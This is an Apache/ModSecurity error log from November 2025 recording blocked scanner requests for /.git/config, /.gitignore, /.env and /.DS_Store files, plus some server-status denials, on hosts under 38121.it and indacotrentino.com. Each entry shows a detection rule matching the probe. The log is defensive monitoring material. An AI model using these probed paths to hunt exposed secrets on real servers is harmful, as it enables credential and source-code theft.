[Fri Nov 07 07:16:12.386993 2025] [:error] [pid 4072121] [client 139.59.132.8:57348] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ2OrJN6UlmotPFSuvOv4gAAAAY"]
[Fri Nov 07 07:16:12.387203 2025] [:error] [pid 4072121] [client 139.59.132.8:57348] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ2OrJN6UlmotPFSuvOv4gAAAAY"]
[Fri Nov 07 07:16:12.387373 2025] [:error] [pid 4072121] [client 139.59.132.8:57348] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ2OrJN6UlmotPFSuvOv4gAAAAY"]
[Fri Nov 07 11:04:59.387998 2025] [:error] [pid 4076689] [client 93.123.109.7:55212] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ3ES_8zeMFx673yrz38vQAAAAg"]
[Fri Nov 07 11:04:59.388302 2025] [:error] [pid 4076689] [client 93.123.109.7:55212] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ3ES_8zeMFx673yrz38vQAAAAg"]
[Fri Nov 07 11:04:59.388480 2025] [:error] [pid 4076689] [client 93.123.109.7:55212] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ3ES_8zeMFx673yrz38vQAAAAg"]
[Fri Nov 07 16:29:32.151879 2025] [:error] [pid 4080689] [client 167.71.164.6:33758] [client 167.71.164.6] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ4QXOlkRz7fk-nFl4iNygAAAAs"]
[Fri Nov 07 16:29:32.152154 2025] [:error] [pid 4080689] [client 167.71.164.6:33758] [client 167.71.164.6] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ4QXOlkRz7fk-nFl4iNygAAAAs"]
[Fri Nov 07 16:29:32.152314 2025] [:error] [pid 4080689] [client 167.71.164.6:33758] [client 167.71.164.6] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ4QXOlkRz7fk-nFl4iNygAAAAs"]
[Fri Nov 07 18:17:48.296328 2025] [:error] [pid 4080691] [client 164.90.141.98:50724] [client 164.90.141.98] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ4pvJmYpo3F56jXg6cjLQAAAA0"]
[Fri Nov 07 18:17:48.296614 2025] [:error] [pid 4080691] [client 164.90.141.98:50724] [client 164.90.141.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ4pvJmYpo3F56jXg6cjLQAAAA0"]
[Fri Nov 07 18:17:48.296781 2025] [:error] [pid 4080691] [client 164.90.141.98:50724] [client 164.90.141.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ4pvJmYpo3F56jXg6cjLQAAAA0"]
[Fri Nov 07 19:06:46.277111 2025] [:error] [pid 4080691] [client 204.76.203.25:51284] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aQ41NpmYpo3F56jXg6cjMgAAAA0"]
[Fri Nov 07 19:06:46.277416 2025] [:error] [pid 4080691] [client 204.76.203.25:51284] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aQ41NpmYpo3F56jXg6cjMgAAAA0"]
[Fri Nov 07 19:06:46.277576 2025] [:error] [pid 4080691] [client 204.76.203.25:51284] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aQ41NpmYpo3F56jXg6cjMgAAAA0"]
[Sat Nov 08 09:30:06.521707 2025] [authz_core:error] [pid 4095501] [client 138.68.86.32:54954] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Nov 08 09:30:08.184584 2025] [:error] [pid 4095499] [client 138.68.86.32:54992] [client 138.68.86.32] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ7_kJVVjRlD4-_LJdevLQAAAAY"]
[Sat Nov 08 09:30:08.184803 2025] [:error] [pid 4095499] [client 138.68.86.32:54992] [client 138.68.86.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ7_kJVVjRlD4-_LJdevLQAAAAY"]
[Sat Nov 08 09:30:08.184968 2025] [:error] [pid 4095499] [client 138.68.86.32:54992] [client 138.68.86.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ7_kJVVjRlD4-_LJdevLQAAAAY"]
[Sat Nov 08 09:30:08.617540 2025] [:error] [pid 4095016] [client 138.68.86.32:53416] [client 138.68.86.32] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ7_kIMq9sGX0VdFvpUJhwAAAAM"]
[Sat Nov 08 09:30:08.617753 2025] [:error] [pid 4095016] [client 138.68.86.32:53416] [client 138.68.86.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ7_kIMq9sGX0VdFvpUJhwAAAAM"]
[Sat Nov 08 09:30:08.617925 2025] [:error] [pid 4095016] [client 138.68.86.32:53416] [client 138.68.86.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ7_kIMq9sGX0VdFvpUJhwAAAAM"]
[Sat Nov 08 09:30:09.035814 2025] [:error] [pid 4095013] [client 138.68.86.32:53428] [client 138.68.86.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ7_kQL2_mVywaxmP86lVQAAAAA"]
[Sat Nov 08 09:30:09.036027 2025] [:error] [pid 4095013] [client 138.68.86.32:53428] [client 138.68.86.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ7_kQL2_mVywaxmP86lVQAAAAA"]
[Sat Nov 08 09:30:09.036201 2025] [:error] [pid 4095013] [client 138.68.86.32:53428] [client 138.68.86.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ7_kQL2_mVywaxmP86lVQAAAAA"]
[Sat Nov 08 09:36:11.983556 2025] [authz_core:error] [pid 4095016] [client 206.81.24.74:36468] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Nov 08 09:36:12.271539 2025] [:error] [pid 4099466] [client 206.81.24.74:36506] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ8A_P0s1v4jWCPyFIEjGgAAAAk"]
[Sat Nov 08 09:36:12.271773 2025] [:error] [pid 4099466] [client 206.81.24.74:36506] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ8A_P0s1v4jWCPyFIEjGgAAAAk"]
[Sat Nov 08 09:36:12.271938 2025] [:error] [pid 4099466] [client 206.81.24.74:36506] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ8A_P0s1v4jWCPyFIEjGgAAAAk"]
[Sat Nov 08 09:36:12.341235 2025] [:error] [pid 4095013] [client 206.81.24.74:36510] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ8A_AL2_mVywaxmP86lvwAAAAA"]
[Sat Nov 08 09:36:12.341471 2025] [:error] [pid 4095013] [client 206.81.24.74:36510] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ8A_AL2_mVywaxmP86lvwAAAAA"]
[Sat Nov 08 09:36:12.341654 2025] [:error] [pid 4095013] [client 206.81.24.74:36510] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ8A_AL2_mVywaxmP86lvwAAAAA"]
[Sat Nov 08 09:36:12.469684 2025] [:error] [pid 4099466] [client 206.81.24.74:36524] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ8A_P0s1v4jWCPyFIEjGwAAAAk"]
[Sat Nov 08 09:36:12.469883 2025] [:error] [pid 4099466] [client 206.81.24.74:36524] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ8A_P0s1v4jWCPyFIEjGwAAAAk"]
[Sat Nov 08 09:36:12.470062 2025] [:error] [pid 4099466] [client 206.81.24.74:36524] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ8A_P0s1v4jWCPyFIEjGwAAAAk"]
[Sat Nov 08 11:40:04.091257 2025] [:error] [pid 4095016] [client 204.76.203.25:35402] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitignore"] [unique_id "aQ8eBIMq9sGX0VdFvpUJnwAAAAM"]
[Sat Nov 08 11:40:04.091526 2025] [:error] [pid 4095016] [client 204.76.203.25:35402] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitignore"] [unique_id "aQ8eBIMq9sGX0VdFvpUJnwAAAAM"]
[Sat Nov 08 11:40:04.091710 2025] [:error] [pid 4095016] [client 204.76.203.25:35402] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitignore"] [unique_id "aQ8eBIMq9sGX0VdFvpUJnwAAAAM"]
[Sat Nov 08 17:11:38.138169 2025] [:error] [pid 4095016] [client 176.65.148.212:38058] [client 176.65.148.212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ9ruoMq9sGX0VdFvpUJvAAAAAM"]
[Sat Nov 08 17:11:38.138542 2025] [:error] [pid 4095016] [client 176.65.148.212:38058] [client 176.65.148.212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ9ruoMq9sGX0VdFvpUJvAAAAAM"]
[Sat Nov 08 17:11:38.138715 2025] [:error] [pid 4095016] [client 176.65.148.212:38058] [client 176.65.148.212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ9ruoMq9sGX0VdFvpUJvAAAAAM"]
[Sat Nov 08 19:56:01.109321 2025] [authz_core:error] [pid 4095016] [client 138.68.86.32:54380] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
